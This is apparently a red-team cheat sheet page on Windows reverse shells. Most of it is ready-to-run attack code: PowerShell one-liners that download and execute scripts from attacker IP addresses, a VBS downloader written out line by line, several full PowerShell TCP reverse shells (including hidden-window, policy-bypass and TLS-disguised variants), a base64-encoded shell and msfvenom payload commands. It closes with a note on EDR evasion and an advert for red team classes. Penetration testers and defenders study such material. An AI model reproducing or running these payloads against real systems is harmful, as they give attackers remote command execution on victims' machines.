# Windows Reverse Shell

### Windows Reverse Shells

#### Power of Powershell on Windows

Download Reverse Shells on the target machine:

{% code title="Download and execute the script" overflow="wrap" %}

```powershell
powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1'/
```

{% endcode %}

{% code title="Run the shell in memory" overflow="wrap" %}

```powershell
powershell.exe iex(invoke-webrequest("http://10.10.10.10:8001/powerrev.ps1") -UseBasicParsing))

powershell.exe iex(iwr(http://10.10.10.10:8001/powerrev.ps1) -usebasicparsing)
```

{% endcode %}

{% code title="Download the rev shell on the target and save it" overflow="wrap" %}

```powershell
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1
```

{% endcode %}

{% code title="Multiple ways to download and execute the shell on the victim system" overflow="wrap" %}

```powershell
iex (New-Object Net.Webclient).DownloadString('https://webserver/payload.ps1')																				
																	
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.56.102:8002/shell.ps1');sleep 2;$response=$ie.Document.body.innerHTML;$ie.quit();$wshell = New-Object -ComObject wscript.shell;$wshell.AppActivate($OpenWindow.MainWindowTitle);Start-Sleep -Seconds 3;$wshell.SendKeys("{ENTER}");iex $response; iex $wshell																				
```

{% endcode %}

{% code title="PSv3 onwards" overflow="wrap" %}

```powershell
iex (iwr 'http://192.168.230.1/evil.ps1')																				
																				
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET', 'http://192.168.56.102:8002/shell.ps1',$false);$h.send();iex $h.responseText																				
																				
$wr= [System.NET.WebRequest]::Create("http://192.168.56.102:8002/shell.ps1")																				
$r=$wr.GetResponse()																				
IEX([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```

{% endcode %}

{% code title="Download shell with VBS" overflow="wrap" %}

```powershell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs	
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs	
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs	
echo Err.Clear >> wget.vbs	
echo Set http = Nothing >> wget.vbs	
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs	
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs	
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs	
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs	
echo http.Open "GET", strURL, False >> wget.vbs	
echo http.Send >> wget.vbs	
echo varByteArray = http.ResponseBody >> wget.vbs	
echo Set http = Nothing >> wget.vbs	
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs	
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs	
echo strData = "" >> wget.vbs	
echo strBuffer = "" >> wget.vbs	
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs	
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs	
echo Next >> wget.vbs	
echo ts.Close >> wget.vbs
```

{% endcode %}

### Some more powershell shells:

{% code overflow="wrap" %}

```powershell
$LHOST = "10.10.10.10"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.1.1',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
```

{% endcode %}

{% code title="Base64 encode with nc -lvvnp 9001" overflow="wrap" %}

```
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
```

{% endcode %}

{% code title="Powershell on TLS" overflow="wrap" %}

```powershell
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
```

{% endcode %}

#### Windows Stageless reverse TCP <a href="#windows-stageless-reverse-tcp" id="windows-stageless-reverse-tcp"></a>

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4244 -f exe > reverse.exe
```

{% endcode %}

#### Windows Staged reverse TCP <a href="#windows-stageless-reverse-tcp" id="windows-stageless-reverse-tcp"></a>

{% code overflow="wrap" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
```

{% endcode %}

#### **Note on Modern Security Protections and Advanced Tactics**

While the reverse shell techniques outlined above are powerful tools in a red teamer’s arsenal, it’s important to note that modern security systems such as Endpoint Detection and Response (EDR) solutions have become adept at detecting and mitigating such activities. These protections are designed to analyze system behaviors and network traffic to block the known signatures and anomalous patterns associated with reverse shells.

However, advanced techniques do exist to bypass these protections, which often involve sophisticated methods such as memory injection, obfuscation, and the use of legitimate administrative tools to mimic normal user activities. These advanced methods are not only about evading detection but also about understanding and manipulating the underlying systems and security mechanisms.

To learn more about these advanced evasion techniques and to gain hands-on experience in deploying reverse shells while circumventing modern security defenses, we encourage participation in our live red team classes (sessions). These sessions are designed to provide deep insights into the latest red teaming tactics and real-world applications, enabling participants to stay ahead in the ever-evolving landscape of cybersecurity threats and defenses. Join us to transform your theoretical knowledge into practical expertise and master the art of invisible intrusion.